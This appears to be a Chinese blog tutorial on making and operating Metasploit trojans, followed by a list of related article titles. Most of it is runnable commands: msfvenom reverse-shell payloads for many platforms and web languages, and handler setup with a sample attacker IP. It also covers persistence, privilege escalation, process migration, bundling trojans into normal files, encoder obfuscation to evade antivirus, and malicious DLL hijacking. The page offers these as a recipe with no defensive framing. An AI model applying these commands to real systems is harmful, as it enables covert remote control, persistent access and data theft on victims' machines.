Metasploit木马

  • MSF模块介绍
    • auxiliary
    • exploits
    • payloads
    • encoders
    • nops
    • post
  • 木马管理
    • 开启监听
    • 连接多个木马
    • 木马持久化
    • 木马进程迁移
  • 生成木马
    • 生成木马
      • 木马捆绑
      • 木马混淆
    • 劫持DLL
  • 生成脚本木马
    • 设置payload(这里以python为例)
    • 配置payload
    • 生成木马
  • 快捷方式(编写脚本)
    • 生成后门
    • 木马管理
  • 在msfconsole中生成木马并监听
    • 设置payload
    • 配置payload
    • 生成木马
    • 开启监听
    • 查看后台监听进程
    • 查看会话
    • 管理id=1的会话

MSF模块介绍

MSF有6个模块,分别对上面目录下的6个子文件夹:

auxiliary

负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能的辅助模块

exploits

利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动)

payloads

成功exploit之后,真正在目标系统执行的代码或指令。分为3种类型的payload,分别是single、stages和stagers。shellcode是特殊的payload,用于拿shell。
single:all-in-one。完整的payload,这些payload都是一体化的,不需要依赖外部的库和包。
stagers:目标计算机内存有限时,先传输一个较小的payload用于建立连接
stages:利用stagers建立的连接下载后续payload

encoders

对payload进行加密,躲避AntiVirus检查的模块

nops

提高payload稳定性及维持大小。在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区, 这样当触发渗透攻击后跳转执行ShellCode时,有一个较大的安全着陆区,从而避免受到内存 地址随机化、返回地址计算偏差等原因造成的ShellCode执行失败,提高渗透攻击的可靠性。

post

后期渗透模块。在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、跳板攻击等操作

木马管理

开启监听

msfconsole -q:快速打开
use exploit/multi/handler:使用侦听模块
show options:查看模块配置
set LHOST 本地IP:设置监听IP
set LPORT 端口:设置端口
set payload windows/meterpreter/reverse_tcp:设置payload
run/exploit

meterpreter中输入?或help获得帮助文档

连接多个木马

set exitonsession flase:设置监听多个
run -j:后台监听
jobs:后台进程
jobs -k:停止后台监听
sessions:查看会话


sessions -i id:管理其中ID号对应的会话
bg:回退

木马持久化

run #执行已有的模块,输入run后按两下tab,列出已有的脚本。
run persistence -h :查看木马持久化模块脚本帮助文档
run persistence -x -i 3 -p 444 -r 192.168.124.26

木马进程迁移

ps:查看进程
getsystem:提权
migrate -h:迁移进程模块帮助文档
migrate :进程迁移到pid

生成木马

msfvenom -h :查看帮助

msfvenom -l formats:查看可用文件类型

msfvenom -l archs:查看架构

msfvenom -l platforms:查看平台

生成木马

msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 --platform windows -o ./meter_re_tcp_x86.exe

Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf
​
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
​
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.machoWeb PayloadsPHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
​
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
​
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
​
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.warPython
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
​
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
​
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
​

除此之外;

木马捆绑

-x:将木马捆绑在一个正常文件

木马混淆

-e:将木马使用混淆器混淆
-i: 混淆几次

-k:添加一个新的线程。

劫持DLL

生成恶意DLL只需要将format改为DLL。
在cmd中运行DLL。
命令:rundll32 DLL文件,DllEntryPoint

Dll劫持原理:
先伪造一个系统同名的DLL,提供同样的输出表,每个输出函数转向真正的系统DLL。程序调用系统DLL时会先调用当前目录下伪造的DLL,完成相关功能后,再跳到系统DLL同名函数里执行。这个过程用个形象的词来描述就是系统DLL被劫持(hijack)了。
即可执行文件调用伪造为正常的恶意DLL,恶意DLL在调用原本的DLL,在恶意DLL调用正常DLL时,还可以同时调用我们msf生成的木马DLL。
生成恶意DLL:
https://github.com/strivexjun/AheadLib-x86-x64

让恶意DLL调用我们的木马DLL,VS编译一下

生成脚本木马

设置payload(这里以python为例)

use payload/python/meterpreter/reverse_tcp

配置payload

show options
set LHOST IP

生成木马

生成shellcode

generate -f python -o /root/桌面/back.py

生成源码

generate -f raw -o /root/桌面/bak.py

加了混淆的源码。

快捷方式(编写脚本)

新建目录,在目录里写脚本

生成后门

木马管理


在msfconsole中生成木马并监听

设置payload

use payload/linux/x64/meterpreter/reverse_tcp

配置payload

set lhost 192.168.124.26

生成木马

generate -f elf -o /root/桌面/back

开启监听

handler -H 192.168.124.26 -P 4444 -n linux -p linux/x64/meterpreter/reverse_tcp

查看后台监听进程

jobs

查看会话

sessions

管理id=1的会话

sessions -i 1

Metasploit(一)相关推荐

  1. Metasploit攻击Oracle的环境搭建

    Metasploit中关于Oracle的攻击模块默认并不完全,需要自己做一些工作.本文主要记录在搭建环境的中的一些错误(操作系统Backtrack 5).在默认情况下使用oracle的一些攻击功能会出 ...

  2. 使用metasploit中Evasion模块

    简介 几天前我说了kali这次更新我最关心的是metasploit升级到了5.0,5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试 操作 首先打开 ...

  3. Kali linux 2016.2(Rolling)里Metasploit的OpenVAS

    关于OpenAVS的概念,我这里不多赘述. 前提得,大家要先安装好OpenVAS!!! 我们都知道,BT5中已经预先安装好了OpenVAS网络漏洞扫描工具,我们只需进行一些配置即可. 具体,请见我下面 ...

  4. Kali linux 2016.2(Rolling)中metasploit的端口扫描

    目前常见的端口扫描技术一般有如下几类: TCP  Connect.TCP SYN.TCP ACK.TCP FIN. Metasploit中的端口扫描器 Metasploit的辅助模块中提供了几款实用的 ...

  5. 使用metasploit收集邮箱

    来源:milsec.com 作者:影子牛 转载开始. 发现这个还是蛮有用处的,如果感到蛋疼你就拍拍手,至于收集到邮箱之后做什么用途,各位就可以自己随意发挥了 [root@sms framework3] ...

  6. All in one: pentest under metasploit

    源:http://hi.baidu.com/p3rlish/blog/item/f54f4c097a907f8ad1581b0b.html All in one: pentest under meta ...

  7. Kali渗透测试——快速查找Metasploit的模块

    快速查找Metasploit的模块 在渗透测试过程中,通过NMAP可以获取目标主机服务和操作系统信息:通过Nessus和OpenVAS可以获取目标主机存在的漏洞:或者,通过其他工具获取到关键信息.这时 ...

  8. Metasploit***技巧:后***Meterpreter代理

    前言 Metasploit是一个免费的.可下载的***测试框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施***测试.它本身附带数百个已知软件漏洞的专业级漏洞***测试工具. 当H.D. Mo ...

  9. php如何检测在另一台设备登录怎么做_如何使用Metasploit的Web Delivery Script和命令注入弹出Shell(翻译)...

    Web交付概述 Metasploit包含一个有用的模块,它在你的的设备上创建的服务器上承载一个负载.一旦目标设备连接到服务器并执行负载,就会运行web交付脚本.这个模块是通用的,因为它可以面向Pyth ...

  10. metasploit 利用MS08-067渗透攻击xp系统全过程

    工具:metasploit,目标系统 windows xp sp3 English 渗透攻击过程  1.search MS08-067  2. use  exploit/windows/smb/ms0 ...

最新文章

  1. 汉字转16进制java_java实现汉字转unicode与汉字转16进制实例
  2. 为什么要低温保存_渔之歌科普课堂:冷冻食品为什么要规定零下18摄氏度冷藏?...
  3. sql server 小记——分区表(上)
  4. 揭秘 | 大流量场景下发布如『丝般顺滑』背后的原因
  5. C#WinForm WebBrowser (二) 实用方法总结
  6. 投篮c语言程序设计,教师招聘笔试体育之篮球必做20题(一)
  7. CIKM2021推荐系统论文集锦
  8. GCC源码自动编译-python脚本
  9. Hi,我们的代码重构了
  10. Java正则表达式实例详解
  11. weblogic查看版本号教程
  12. 蓝鲸ERP标准版-进销存-采购管理子系统操作说明1
  13. 牛逼!SpringBoot+Vue企业级支付系统!附源码!
  14. Rainmeter监控GPU
  15. Go初体验-实现平方根函数
  16. Springboot顺利达驾校预约管理系统毕业设计-附源码191748
  17. git:SSL证书问题:无法获取本地颁发者证书
  18. 利用vue实现“显示更多”功能
  19. Java web框架
  20. 各串口设备节点/dev/tty* 的区别

热门文章

  1. maven私服客户端配置
  2. 软件项目管理——项目三角形
  3. 2018百度之星程序设计大赛 - 资格赛 A B C E F
  4. 美国华盛顿州立大学计算机排名,华盛顿州立大学专业排名一览及最强专业推荐(USNEWS美国大学排名)...
  5. 1833. 雪糕的最大数量
  6. 数模电路基础知识 —— 1. 回路中的电压、电流、电阻、电功率计算式
  7. 程序员该如何说话?做人?做事?
  8. PostgreSql pg_rewind
  9. 关于CST中S参数、极化方向的详细说明
  10. 如何安装ruby、rails